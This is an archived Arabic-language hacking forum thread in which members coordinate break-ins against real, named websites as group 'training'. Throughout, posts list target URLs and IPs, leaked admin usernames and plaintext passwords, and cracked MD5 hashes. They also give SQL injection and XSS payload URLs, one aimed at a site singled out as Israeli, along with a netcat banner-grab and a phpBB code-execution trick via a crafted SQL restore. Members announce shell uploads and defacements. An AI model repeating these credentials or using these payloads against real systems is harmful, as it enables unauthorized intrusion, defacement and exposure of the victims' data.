:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/forumdisplay.php?f=38)
-   -   [تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :) (http://www.vbspiders.com/vb/showthread.php?t=50558)

bleu moon 07-03-2011 03:44 AM

يلا !! الموقع التاني فيه بنوته حلوه ههه

bleu moon 07-03-2011 03:47 AM

يكفي ؟

SpookWeb 07-03-2011 07:29 AM

بالنسبة للاب الثاني......

Target: http://policewala.in
IP: 174.122.148.162
Control Panel: http://policewala.in/admin/

Admin ID: 1
Admin Username: admin
Admin Password: shivani
Admin Email: i n f o @ n o 1 j o u r n a l i s t . c o m

كنت بشوف دروس الاخ Q2-FOX2R والحمدلله بتعلم شوي شو لول.. ماوصلت بعد لحد الشيل مع إنها باينة سهلة, بس ماأتجرأ بعد. فا يحيا العمل الجماعي :yipi:

bleu moon 07-03-2011 07:39 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة SpookWeb (المشاركة 348433)
بالنسبة للاب الثاني......

Target: http://policewala.in
IP: 174.122.148.162
Control Panel: http://policewala.in/admin/

Admin ID: 1
Admin Username: admin
Admin Password: shivani
Admin Email: i n f o @ n o 1 j o u r n a l i s t . c o m

كنت بشوف دروس الاخ Q2-FOX2R والحمدلله بتعلم شوي شو لول.. ماوصلت بعد لحد الشيل مع إنها باينة سهلة, بس ماأتجرأ بعد. فا يحيا العمل الجماعي :yipi:

تم رفع الشل

SpookWeb 07-03-2011 07:42 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة nor15din (المشاركة 348436)
تم رفع الشل

بالتوفيييييييق
:party:

bleu moon 07-03-2011 07:57 AM

http://mirror.sec-t.net/defacements/?id=50008

bleu moon 07-03-2011 07:57 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة SpookWeb (المشاركة 348437)
بالتوفيييييييق
:party:

تم الاسقاط لوول

SpookWeb 07-03-2011 08:51 AM

هههههه رااااائع دعس :rofl: :whip:

bleu moon 07-03-2011 10:16 AM

لوول مو انا :)
الكل دعسوا ان شاء الله في المره القادمة نضع آندكس جماعي :) يعني بيكون فيه فقط اسم العناكب

SpookWeb 07-03-2011 11:27 PM

السيرفر الاول:

بكره الMD5.............. :grrrrrr:

96372edd7141813a887a699c28c00796

جاري البحث عن طرق بديلة........

SpookWeb 07-03-2011 11:30 PM

هههههههههههه وجدتو.. جاري الإستغلال.

abdellatef 07-03-2011 11:44 PM

هل يوجد هدف اخوي نور
الله يحفظك اعملو قسم استهداف مواقع
اقولها مند الدورة الاولى من الدراسة الصيف نريد نستهدف مملنا عشوائي :)

SpookWeb 07-03-2011 11:50 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة nor15din (المشاركة 348461)
لوول مو انا :)
الكل دعسوا ان شاء الله في المره القادمة نضع آندكس جماعي :) يعني بيكون فيه فقط اسم العناكب

إن شاء الله :)

يلا جهزلي نفسك لرفع ال شل هههههه 90% رح تظبط انشالله :glasses:
هل سيرفر جنني والله :surprised:

bleu moon 07-04-2011 12:57 AM

جميــــــــــــــــــــع مواقع السيرفر مستهدفه :)
تم اسقاط واحد والباقي نشوفوا :) ههه

tenshu2011 07-04-2011 01:16 AM

اضافة :lol:

http://www.cheela.org/rav.php?id=-1%...0limit%201,1--

login = shimon68
pass = apte
-----------------------------------


http://www.cheela.org/rav.php?id=-1%...0limit%200,1--

bleu moon 07-04-2011 01:20 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة tenshu2011 (المشاركة 348745)
اضافة :lol:

http://www.cheela.org/rav.php?id=-1%...0limit%201,1--

login = shimon68
pass = apte
-----------------------------------


http://www.cheela.org/rav.php?id=-1%...0limit%200,1--

السيرفر التاني لوول هذه المواقع لاتملك لوحه :money:

tenshu2011 07-04-2011 01:38 AM

تم وجود cpanel


http://www.cheela.org:2082/login/

tenshu2011 07-04-2011 01:56 AM

هل الأعضاء هنا من أجل المشاركة في كيفية رفع الشال ؟

هذا الموقع

http://rhythmsystem.2pointproject.com


تجريب الانجكشن

http://rhythmsystem.2pointproject.co...ages.php?id=20'

و هذا الحقن

http://rhythmsystem.2pointproject.co...FROM%20admin--



اليوزر rhythm#2p@user
الباس c33dmmrrpm

أرجو الرد و شكرااااااااااااااا

bleu moon 07-04-2011 02:06 AM

انا برفع شل اووك ؟

tenshu2011 07-04-2011 02:17 AM

أكييييييييييي ;)
لم أفهم كيفية رفع الشال
اذا كنت تعرف أبعتلي كيف

عندي مواقع أخرى :angel:

tenshu2011 07-04-2011 02:20 AM

أكيي أعني بها أرفع الشال

bleu moon 07-04-2011 02:20 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة tenshu2011 (المشاركة 348767)
أكييييييييييي ;)
لم أفهم كيفية رفع الشال
اذا كنت تعرف أبعتلي كيف

عندي مواقع أخرى :angel:

اووك لو رفع معي :) بعمل لك شرح بالصوت :mdr:

tenshu2011 07-04-2011 02:34 AM

أكي في الانتظار :D

tenshu2011 07-04-2011 02:36 AM

هل عملت بنظام اللينوكس ؟

أفضل الأدوات لحقن قاعدة البيانات هي sqlninja

لكن تأخذ وقت طويل حسب سرعة النات

;)

bleu moon 07-04-2011 02:41 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة tenshu2011 (المشاركة 348774)
هل عملت بنظام اللينوكس ؟

أفضل الأدوات لحقن قاعدة البيانات هي sqlninja

لكن تأخذ وقت طويل حسب سرعة النات

;)

لا :ouch:

bleu moon 07-04-2011 02:50 AM

الباس غلط :(
http://rhythmsystem.2pointproject.com/admin/

tenshu2011 07-04-2011 02:54 AM

للأسف

أنا أستعمل اللينوكس باك تراك 5

كل أدوات الهاكر موجودة ^^

أنصحك به ..........

رأيت تعليقك حول معرفة السرفر في أحد المواضيع

سهلة جدا باستعمال netcat

netcat -v rhythmsystem.2pointproject.com 80

ثم

HEAD / HTTP/1.0

ثم ENTER مرتين


المثال



root@bt:~# netcat -v rhythmsystem.2pointproject.com 80
DNS fwd/rev mismatch: rhythmsystem.2pointproject.com != 2pointsource.com
rhythmsystem.2pointproject.com [216.227.208.44] 80 (www) open
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 5558
Content-Type: text/html
Content-Location: http://216.227.208.44/Index.html
Last-Modified: Thu, 29 Apr 2010 18:35:38 GMT
Accept-Ranges: bytes
ETag: "a88daac3cae7ca1:14855"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 03 Jul 2011 23:21:31 GMT
Connection: close

bleu moon 07-04-2011 03:01 AM

pass : 57ff5847af65e833fb68e1cd05f063c9
user : admin

http://rhythmsystem.2pointproject.com/admin

bleu moon 07-04-2011 03:02 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة tenshu2011 (المشاركة 348779)
للأسف

أنا أستعمل اللينوكس باك تراك 5

كل أدوات الهاكر موجودة ^^

أنصحك به ..........

رأيت تعليقك حول معرفة السرفر في أحد المواضيع

سهلة جدا باستعمال netcat

netcat -v rhythmsystem.2pointproject.com 80

ثم

HEAD / HTTP/1.0

ثم ENTER مرتين


المثال



root@bt:~# netcat -v rhythmsystem.2pointproject.com 80
DNS fwd/rev mismatch: rhythmsystem.2pointproject.com != 2pointsource.com
rhythmsystem.2pointproject.com [216.227.208.44] 80 (www) open
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 5558
Content-Type: text/html
Content-Location: http://216.227.208.44/Index.html
Last-Modified: Thu, 29 Apr 2010 18:35:38 GMT
Accept-Ranges: bytes
ETag: "a88daac3cae7ca1:14855"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 03 Jul 2011 23:21:31 GMT
Connection: close

مافهمت ولا حاجه هههههههه :grrrrrr:
ذي معلومات للسيرفر فقط :) ؟

tenshu2011 07-04-2011 03:08 AM

نعم للسرفر
من أين حصلت على الباس المشفرة ؟
هل فكيت التشفير

tenshu2011 07-04-2011 03:16 AM

الباس المشفة ليست صالحة

هذا الفك
c3d3rrun

tenshu2011 07-04-2011 03:34 AM

اعادة تشفيرها

http://schwett.com/md5/index.php?md5...md5c=MD5+Krypt

نفس النتيجة

SpookWeb 07-04-2011 03:45 AM

السيرفر راح يسببلي الجنوووووون :mad:

وسيلة لحد هنا:

http://www.cheela.org/cheelfor
http://www.cheela.org/cheelfor/admin
phpBB forum
username: vbondoux
he's admin...
pass: sZCnYyk8

جربت كتير, ماقدرت الاقي وسيلة لرفع الشيل. بس في طريقة غير...

تخلق فيل تسميه "Shell.sql" أو آية شي تاني... بس يكون sql.وتحت داخيلو
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo());' WHERE user_id=2;
وبعدها تعمل restore database من لوحة التحكم الادمن.

وفي تعديل ال profile نرى أن معلومات ال php ظهرت. يعني بالكود نبدل phpinfo() بـأي كود php تاني ويمشي. بس أنا مااعرف اش......... وللصراحة يئست منيل phpBB ورايح الدور على ثغرة تانية بـنفس الموقع.

tenshu2011 07-04-2011 03:53 AM

الحمد لله أنك استفدت من فك التشفير

مشكلتي أني لا أعرف رفع الشال اذا لم أجد الأبلود
أو تحديد مكانه في url

bleu moon 07-04-2011 05:32 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة tenshu2011 (المشاركة 348782)
نعم للسرفر
من أين حصلت على الباس المشفرة ؟
هل فكيت التشفير

لا
كنت بصمم آندكس هه

bleu moon 07-04-2011 05:33 AM

مين رفع شل ؟

bleu moon 07-04-2011 09:26 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة 123s123 (المشاركة 348067)
تم أكتشاف ثغرة XSS ههه

والأحلى علا موقع إسرائيلي

http://www.spalter-mikvehs.com/conta...B%3C/ScRiPt%3E

http://www.spalter-mikvehs.com/contact.php
تم الاسقاط

bleu moon 07-04-2011 09:27 AM

http://www.spalter-mikvehs.com/conta...=stylesheet%3E

abdellatef 07-04-2011 04:03 PM

الله عليك يا غالي م في سرفر اخر هدف ندعس ابوه
ولكن يكون مملوء مواقع 1000 او اكتر لكي يتوفر المجال لكل الهاكرز مبتدئ متوسط ..

bleu moon 07-04-2011 10:27 PM

اعطونا السيرفر يلي بدكم


الساعة الآن 08:48 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0